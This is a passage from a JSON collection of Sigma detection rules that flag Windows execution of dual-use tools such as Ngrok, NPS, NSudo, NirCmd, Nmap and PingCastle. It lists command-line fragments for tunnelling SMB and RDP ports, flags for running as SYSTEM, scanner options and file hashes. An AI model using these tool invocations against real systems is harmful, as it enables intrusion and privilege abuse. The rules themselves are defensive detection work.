    "content": "title: PUA - SoftPerfect Netscan Execution\nid: ca387a8e-1c84-4da3-9993-028b45342d30\nstatus: test\ndescription: |\n    Detects usage of SoftPerfect's \"netscan.exe\". An application for scanning networks.\n    It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.\nreferences:\n    - https://www.protect.airbus.com/blog/uncovering-cyber-intruders-netscan/\n    - https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf\n    - https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue\n    - https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/\n    - https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/\n    - https://www.softperfect.com/products/networkscanner/\nauthor: '@d4ns4n_ (Wuerth-Phoenix)'\ndate: 2024-04-25\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\netscan.exe'\n        - Product: 'Network Scanner'\n        - Description: 'Application for scanning networks'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_ngrok.yml",
    "content": "title: PUA - Ngrok Execution\nid: ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31\nstatus: test\ndescription: |\n  Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\n  Involved domains are bin.equinox.io for download and *.ngrok.io for connections.\nreferences:\n    - https://ngrok.com/docs\n    - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html\n    - https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp\n    - https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection\n    - https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/\n    - https://twitter.com/xorJosh/status/1598646907802451969\n    - https://www.softwaretestinghelp.com/how-to-use-ngrok/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-14\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - ' tcp 139'\n            - ' tcp 445'\n            - ' tcp 3389'\n            - ' tcp 5985'\n            - ' tcp 5986'\n    selection2:\n        CommandLine|contains|all:\n            - ' start '\n            - '--all'\n            - '--config'\n            - '.yml'\n    selection3:\n        Image|endswith: 'ngrok.exe'\n        CommandLine|contains:\n            - ' tcp '\n            - ' http '\n            - ' authtoken '\n    selection4:\n        CommandLine|contains:\n            - '.exe authtoken '\n            - '.exe start --all'\n    condition: 1 of selection*\nfalsepositives:\n    - Another tool that uses the command line switches of Ngrok\n    - Ngrok http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nimgrab.yml",
    "content": "title: PUA - Nimgrab Execution\nid: 74a12f18-505c-4114-8d0b-8448dd5485c6\nstatus: test\ndescription: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md\nauthor: frack113\ndate: 2022-08-28\nmodified: 2024-11-23\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        Image|endswith: '\\nimgrab.exe'\n    selection_hashes:\n        Hashes|contains:\n            - MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B\n            - SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559\n            - IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use of Nim on developer systems\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nimscan.yml",
    "content": "title: PUA - NimScan Execution\nid: 4fd6b1c7-19b8-4488-97f6-00f0924991a3\nstatus: test\ndescription: |\n    Detects usage of NimScan, a portscanner utility.\n    In early 2025, adversaries were observed using this utility to scan for open ports on remote hosts in a compromised environment.\n    This rule identifies the execution of NimScan based on the process image name and specific hash values associated with different versions of the tool.\nreferences:\n    - https://x.com/cyberfeeddigest/status/1887041526397587859\n    - https://github.com/elddy/NimScan\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\NimScan.exe' # Other metadata fields such as originalfilename and product were omitted because they were null\n        - Hashes|contains:\n              - 'IMPHASH=41BB1C7571B3A724EB83A1D2B96DBB8C' # v1.0.8\n              - 'IMPHASH=B1B6ADACB172795480179EFD18A29549' # v1.0.6\n              - 'IMPHASH=0D1F896DC7642AD8384F9042F30279C2' # v1.0.4 and v1.0.2\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nircmd.yml",
    "content": "title: PUA - NirCmd Execution\nid: 4e2ed651-1906-4a59-a78a-18220fca1b22\nstatus: test\ndescription: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity\nreferences:\n    - https://www.nirsoft.net/utils/nircmd.html\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\n    - https://www.nirsoft.net/utils/nircmd2.html#using\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-24\nmodified: 2023-02-13\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_org:\n        - Image|endswith: '\\NirCmd.exe'\n        - OriginalFileName: 'NirCmd.exe'\n    selection_cmd:\n        CommandLine|contains:\n            - ' execmd '\n            - '.exe script '\n            - '.exe shexec '\n            - ' runinteractive '\n    combo_exec:\n        CommandLine|contains:\n            - ' exec '\n            - ' exec2 '\n    combo_exec_params:\n        CommandLine|contains:\n            - ' show '\n            - ' hide '\n    condition: 1 of selection_* or all of combo_*\nfalsepositives:\n    - Legitimate use by administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml",
    "content": "title: PUA - NirCmd Execution As LOCAL SYSTEM\nid: d9047477-0359-48c9-b8c7-792cedcdc9c4\nstatus: test\ndescription: Detects the use of NirCmd tool for command execution as SYSTEM user\nreferences:\n    - https://www.nirsoft.net/utils/nircmd.html\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\n    - https://www.nirsoft.net/utils/nircmd2.html#using\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-24\nmodified: 2023-02-13\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ' runassystem '\n    condition: selection\nfalsepositives:\n    - Legitimate use by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nmap_zenmap.yml",
    "content": "title: PUA - Nmap/Zenmap Execution\nid: f6ecd1cf-19b8-4488-97f6-00f0924991a3\nstatus: test\ndescription: Detects usage of nmap/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation\nreferences:\n    - https://nmap.org/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows\nauthor: frack113\ndate: 2021-12-10\nmodified: 2023-12-11\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\nmap.exe'\n              - '\\zenmap.exe'\n        - OriginalFileName:\n              - 'nmap.exe'\n              - 'zenmap.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nps.yml",
    "content": "title: PUA - NPS Tunneling Tool Execution\nid: 68d37776-61db-42f5-bf54-27e87072d17e\nstatus: test\ndescription: Detects the use of NPS, a port forwarding and intranet penetration proxy server\nreferences:\n    - https://github.com/ehang-io/nps\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-08\nmodified: 2024-11-23\ntags:\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\npc.exe'\n    selection_cli_1:\n        CommandLine|contains|all:\n            - ' -server='\n            - ' -vkey='\n            - ' -password='\n    selection_cli_2:\n        CommandLine|contains: ' -config=npc'\n    selection_hashes:\n        # v0.26.10\n        Hashes|contains:\n            - \"MD5=AE8ACF66BFE3A44148964048B826D005\"\n            - \"SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181\"\n            - \"SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856\"\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_nsudo.yml",
    "content": "title: PUA - NSudo Execution\nid: 771d1eb5-9587-4568-95fb-9ec44153a012\nstatus: test\ndescription: Detects the use of NSudo tool for command execution\nreferences:\n    - https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali\ndate: 2022-01-24\nmodified: 2023-02-13\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\NSudo.exe'\n              - '\\NSudoLC.exe'\n              - '\\NSudoLG.exe'\n        - OriginalFileName:\n              - 'NSudo.exe'\n              - 'NSudoLC.exe'\n              - 'NSudoLG.exe'\n    selection_cli:\n        CommandLine|contains:\n            # Covers Single/Double dash \"-\"/\"--\" + \":\"\n            - '-U:S ' # System\n            - '-U:T ' # Trusted Installer\n            - '-U:E ' # Elevated\n            - '-P:E ' # Enable All Privileges\n            - '-M:S ' # System Integrity\n            - '-M:H ' # High Integrity\n            # Covers Single/Double dash \"-\"/\"--\" + \"=\"\n            - '-U=S '\n            - '-U=T '\n            - '-U=E '\n            - '-P=E '\n            - '-M=S '\n            - '-M=H '\n            - '-ShowWindowMode:Hide'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_pingcastle.yml",
    "content": "title: PUA - PingCastle Execution\nid: b1cb4ab6-ac31-43f4-adf1-d9d08957419c\nrelated:\n    - id: b37998de-a70b-4f33-b219-ec36bf433dc0\n      type: derived\nstatus: test\ndescription: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.\nreferences:\n    - https://github.com/vletoux/pingcastle\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450\n    - https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680\n    - https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699\n    - https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8\n    - https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2024-01-11\ntags:\n    - attack.reconnaissance\n    - attack.t1595\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Hashes|contains:\n              # PingCastle.exe\n              - 'MD5=f741f25ac909ee434e50812d436c73ff'\n              - 'MD5=d40acbfc29ee24388262e3d8be16f622'\n              - 'MD5=01bb2c16fadb992fa66228cd02d45c60'\n              - 'MD5=9e1b18e62e42b5444fc55b51e640355b'\n              - 'MD5=b7f8fe33ac471b074ca9e630ba0c7e79'\n              - 'MD5=324579d717c9b9b8e71d0269d13f811f'\n              - 'MD5=63257a1ddaf83cfa43fe24a3bc06c207'\n              - 'MD5=049e85963826b059c9bac273bb9c82ab'\n              - 'MD5=ecb98b7b4d4427eb8221381154ff4cb2'\n              - 'MD5=faf87749ac790ec3a10dd069d10f9d63'\n              - 
'MD5=f296dba5d21ad18e6990b1992aea8f83'\n              - 'MD5=93ba94355e794b6c6f98204cf39f7a11'\n              - 'MD5=a258ef593ac63155523a461ecc73bdba'\n              - 'MD5=97000eb5d1653f1140ee3f47186463c4'\n              - 'MD5=95eb317fbbe14a82bd9fdf31c48b8d93'\n              - 'MD5=32fe9f0d2630ac40ea29023920f20f49'\n              - 'MD5=a05930dde939cfd02677fc18bb2b7df5'\n              - 'MD5=124283924e86933ff9054a549d3a268b'\n              - 'MD5=ceda6909b8573fdeb0351c6920225686'\n              - 'MD5=60ce120040f2cd311c810ae6f6bbc182'\n              - 'MD5=2f10cdc5b09100a260703a28eadd0ceb'\n              - 'MD5=011d967028e797a4c16d547f7ba1463f'\n              - 'MD5=2da9152c0970500c697c1c9b4a9e0360'\n              - 'MD5=b5ba72034b8f44d431f55275bace9f8b'\n              - 'MD5=d6ed9101df0f24e27ff92ddab42dacca'\n              - 'MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d'\n              - 'MD5=5e083cd0143ae95a6cb79b68c07ca573'\n              - 'MD5=28caff93748cb84be70486e79f04c2df'\n              - 'MD5=9d4f12c30f9b500f896efd1800e4dd11'\n              - 'MD5=4586f7dd14271ad65a5fb696b393f4c0'\n              - 'MD5=86ba9dddbdf49215145b5bcd081d4011'\n              - 'MD5=9dce0a481343874ef9a36c9a825ef991'\n              - 'MD5=85890f62e231ad964b1fda7a674747ec'\n              - 'MD5=599be548da6441d7fe3e9a1bb8cb0833'\n              - 'MD5=9b0c7fd5763f66e9b8c7b457fce53f96'\n              - 'MD5=32d45718164205aec3e98e0223717d1d'\n              - 'MD5=6ff5f373ee7f794cd17db50704d00ddb'\n              - 'MD5=88efbdf41f0650f8f58a3053b0ca0459'\n              - 'MD5=ef915f61f861d1fb7cbde9afd2e7bd93'\n              - 'MD5=781fa16511a595757154b4304d2dd350'\n              - 'MD5=5018ec39be0e296f4fc8c8575bfa8486'\n              - 'MD5=f4a84d6f1caf0875b50135423d04139f'\n              - 'SHA1=9c1431801fa6342ed68f047842b9a11778fc669b'\n              - 'SHA1=c36c862f40dad78cb065197aad15fef690c262f2'\n              - 'SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d'\n              - 
'SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f'\n              - 'SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa'\n              - 'SHA1=f14c9633040897d375e3069fddc71e859f283778'\n              - 'SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc'\n              - 'SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937'\n              - 'SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36'\n              - 'SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b'\n              - 'SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc'\n              - 'SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11'\n              - 'SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995'\n              - 'SHA1=607e1fa810c799735221a609af3bfc405728c02d'\n              - 'SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3'\n              - 'SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a'\n              - 'SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491'\n              - 'SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178'\n              - 'SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4'\n              - 'SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84'\n              - 'SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea'\n              - 'SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17'\n              - 'SHA1=81d67b3d70c4e855cb11a453cc32997517708362'\n              - 'SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad'\n              - 'SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2'\n              - 'SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92'\n              - 'SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1'\n              - 'SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a'\n              - 'SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db'\n              - 'SHA1=3150f14508ee4cae19cf09083499d1cda8426540'\n              - 'SHA1=036ad9876fa552b1298c040e233d620ea44689c6'\n              - 'SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5'\n              - 'SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c'\n              - 'SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d'\n 
             - 'SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4'\n              - 'SHA1=c82152cddf9e5df49094686531872ecd545976db'\n              - 'SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61'\n              - 'SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836'\n              - 'SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719'\n              - 'SHA1=34c0c5839af1c92bce7562b91418443a2044c90d'\n              - 'SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08'\n              - 'SHA1=3a515551814775df0ccbe09f219bc972eae45a10'\n              - 'SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b'\n              - 'SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85'\n              - 'SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03'\n              - 'SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795'\n              - 'SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f'\n              - 'SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a'\n              - 'SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275'\n              - 'SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b'\n              - 'SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2'\n              - 'SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae'\n              - 'SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6'\n              - 'SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a'\n              - 'SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1'\n              - 'SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559'\n              - 'SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2'\n              - 'SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef'\n              - 
'SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d'\n              - 'SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524'\n              - 'SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b'\n              - 'SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b'\n              - 'SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629'\n              - 'SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358'\n              - 'SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca'\n              - 'SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea'\n              - 'SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172'\n              - 'SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4'\n              - 'SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2'\n              - 'SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66'\n              - 'SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27'\n              - 'SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41'\n              - 'SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1'\n              - 'SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0'\n              - 'SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8'\n              - 'SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d'\n              - 'SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726'\n              - 'SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90'\n              - 'SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5'\n              - 'SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140'\n              
- 'SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87'\n              - 'SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892'\n              - 'SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054'\n              - 'SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd'\n        - Image|endswith: '\\PingCastle.exe'\n        - OriginalFileName: PingCastle.exe\n        - Product: 'Ping Castle'\n        - CommandLine|contains:\n              - '--scanner aclcheck'\n              - '--scanner antivirus'\n              - '--scanner computerversion'\n              - '--scanner foreignusers'\n              - '--scanner laps_bitlocker'\n              - '--scanner localadmin'\n              - '--scanner nullsession'\n              - '--scanner nullsession-trust'\n              - '--scanner oxidbindings'\n              - '--scanner remote'\n              - '--scanner share'\n              - '--scanner smb'\n              - '--scanner smb3querynetwork'\n              - '--scanner spooler'\n              - '--scanner startup'\n              - '--scanner zerologon'\n        - CommandLine|contains: '--no-enum-limit'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--level Full'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--server '\n    condition: selection\nfalsepositives:\n    - Unknown\n# Note: As this is a PUA the level may vary depending on your environment. Reduce or increase the level as you see fit\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml",
    "content": "title: PUA - PingCastle Execution From Potentially Suspicious Parent\nid: b37998de-a70b-4f33-b219-ec36bf433dc0\nrelated:\n    - id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c\n      type: derived\nstatus: test\ndescription: |\n    Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.\nreferences:\n    - https://github.com/vletoux/pingcastle\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450\n    - https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680\n    - https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699\n    - https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8\n    - https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2024-01-11\ntags:\n    - attack.reconnaissance\n    - attack.t1595\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_ext:\n        ParentCommandLine|contains:\n            - '.bat'\n            - '.chm'\n            - '.cmd'\n            - '.hta'\n            - '.htm'\n            - '.html'\n            - '.js'\n            - '.lnk'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    selection_parent_path_1:\n        ParentCommandLine|contains:\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - 
'\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming\\'\n            - '\\Temporary Internet'\n    selection_parent_path_2:\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n    selection_cli:\n        - Image|endswith: '\\PingCastle.exe'\n        - OriginalFileName: PingCastle.exe\n        - Product: 'Ping Castle'\n        - CommandLine|contains:\n              - '--scanner aclcheck'\n              - '--scanner antivirus'\n              - '--scanner computerversion'\n              - '--scanner foreignusers'\n              - '--scanner laps_bitlocker'\n              - '--scanner localadmin'\n              - '--scanner nullsession'\n              - '--scanner nullsession-trust'\n              - '--scanner oxidbindings'\n              - '--scanner remote'\n              - '--scanner share'\n              - '--scanner smb'\n              - '--scanner smb3querynetwork'\n              - '--scanner spooler'\n              - '--scanner startup'\n              - '--scanner zerologon'\n        - CommandLine|contains: '--no-enum-limit'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--level Full'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--server '\n    condition: 1 of selection_parent_* and selection_parent_ext and selection_cli\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml",
    "content": "title: PUA - Process Hacker Execution\nid: 811e0002-b13b-4a15-9d00-a613fce66e42\nrelated:\n    - id: 5722dff1-4bdd-4949-86ab-fbaf707e767a\n      type: similar\nstatus: test\ndescription: |\n    Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).\n    Process Hacker is a tool to view and manipulate processes, kernel options and other low level options.\n    Threat actors abused older vulnerable versions to manipulate system processes.\nreferences:\n    - https://processhacker.sourceforge.io/\n    - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-10\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1622\n    - attack.t1564\n    - attack.t1543\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|contains: '\\ProcessHacker_'\n        - Image|endswith: '\\ProcessHacker.exe'\n        - OriginalFileName:\n              - 'ProcessHacker.exe'\n              - 'Process Hacker'\n        - Description: 'Process Hacker'\n        - Product: 'Process Hacker'\n        - Hashes|contains:\n              - 'MD5=68F9B52895F4D34E74112F3129B3B00D'\n              - 'MD5=B365AF317AE730A67C936F21432B9C71'\n              - 'SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D'\n              - 'SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E'\n              - 'SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F'\n              - 'SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4'\n              - 'IMPHASH=3695333C60DEDECDCAFF1590409AA462'\n              - 'IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF'\n    condition: selection\nfalsepositives:\n    - While sometimes 'Process Hacker is used by legitimate administrators, the execution of 
Process Hacker must be investigated and allowed on a case by case basis\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_radmin.yml",
